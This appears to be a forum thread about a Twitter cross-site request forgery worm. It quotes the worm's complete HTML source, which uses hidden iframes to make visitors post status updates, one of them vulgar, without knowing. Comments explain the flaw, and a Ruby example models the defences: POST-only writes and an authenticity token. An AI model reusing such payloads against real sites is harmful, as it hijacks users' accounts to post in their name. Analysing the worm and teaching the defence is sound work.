Below is the source of the worm for the curious - it's surprisingly very simple.

<pre><code><html>
<head></head>
<body>
<script>
var el1 = document.createElement('iframe');
var el2 = document.createElement('iframe');
el1.style.visibility="hidden";
el2.style.visibility="hidden";
el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location;
el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats";
document.getElementsByTagName("body")[0].appendChild(el1);
document.getElementsByTagName("body")[0].appendChild(el2);
</script>
</body>
</html></code></pre>
Kids -- this is why you only support POST/PUTs for writes, and if possible, require some kind of authenticity token. I guess this is what al3x was talking about when he meant that Twitter should hire a security expert.
Twitter's blog post on the vulnerability: <a href="http://status.twitter.com/post/1192873885/malicious-links-on-twitter" rel="nofollow">http://status.twitter.com/post/1192873885/malicious-links-on...</a>.
Twitter is vulnerable to CSRF (which is what this is). And it is so simple to prevent it in Rails (which is what Twitter uses). Interestingly, the page announcing CSRF protection in Rails uses a Twitter CSRF example. In 2007!! And Twitter still hasn't done anything. <a href="http://m.onkey.org/2007/9/28/csrf-protection-for-your-existing-rails-application" rel="nofollow">http://m.onkey.org/2007/9/28/csrf-protection-for-your-existi...</a>

Also this status post should be a POST.
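The two defences the comments above call for (writes only over POST/PUT, plus a session-bound authenticity token) are shown below in a small Ruby model written for this page. It is not Twitter's code and not Rails' own `protect_from_forgery` implementation, though Rails follows the same idea; the `request` Hash shape, the `authorize_status_update` function name and the sample requests are all constructed for the example.

```ruby
require 'securerandom'

# HTTP methods on which a state-changing request is accepted at all.
WRITE_METHODS = %w[POST PUT PATCH DELETE].freeze

# Issue (once per session) a random token and store it server-side. Forms the
# site itself renders embed it as a hidden field; a page on another origin,
# such as the hidden iframes above, cannot read it and so cannot replay it.
def issue_csrf_token(session)
  session[:csrf_token] ||= SecureRandom.hex(32)
end

# Constant-time comparison so a wrong token is not rejected faster or slower
# depending on how many leading bytes happened to match.
def secure_compare(a, b)
  return false if a.nil? || b.nil? || a.bytesize != b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# Decide whether a status-update request may write. `request` is a plain Hash
# (constructed for this example) with :method, :session and :params keys.
# Returns [:accept | :reject, reason].
def authorize_status_update(request)
  method  = request[:method].to_s.upcase
  session = request[:session]
  params  = request[:params] || {}

  # 1. Never write on GET. An <iframe src=...> or <img src=...> can only issue
  #    GET, so this alone stops the worm's request, even with cookies attached.
  return [:reject, 'write requires POST/PUT'] unless WRITE_METHODS.include?(method)

  # 2. The submitted token must equal the one bound to this session. A forged
  #    cross-origin form can still POST with the victim's cookies, but it has
  #    no way to learn the token, so it fails here.
  expected = session[:csrf_token]
  return [:reject, 'no session token'] if expected.nil?
  unless secure_compare(params['authenticity_token'], expected)
    return [:reject, 'bad authenticity token']
  end

  [:accept, "status set to #{params['status']}"]
end

# Three constructed requests against one logged-in session:
# the worm-style GET, a forged POST without a token, and a legitimate form post.
def demo
  session = {}
  token = issue_csrf_token(session)

  worm   = { method: 'GET',  session: session,
             params: { 'status' => 'posted from a hidden iframe' } }
  forged = { method: 'POST', session: session,
             params: { 'status' => 'posted from a cross-origin form' } }
  legit  = { method: 'POST', session: session,
             params: { 'status' => 'hello', 'authenticity_token' => token } }

  [worm, forged, legit].map { |r| authorize_status_update(r).first }
end

puts demo.inspect if __FILE__ == $PROGRAM_NAME   # => [:reject, :reject, :accept]
```

The order of the checks matters: the method check is cheap and stops the iframe/img class of attack outright, while the token check covers the case the first check cannot, a cross-origin page that auto-submits a POST form with the victim's cookies. Rails does both in `protect_from_forgery`, which is the mechanism the linked 2007 post describes.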
Interesting that it hits just as the TC Hackday demos go live. I wonder how many of those are going to be using Twitter and if this will affect them (will Twitter take the API down for a bit while they fix this, or is this part of a hack?).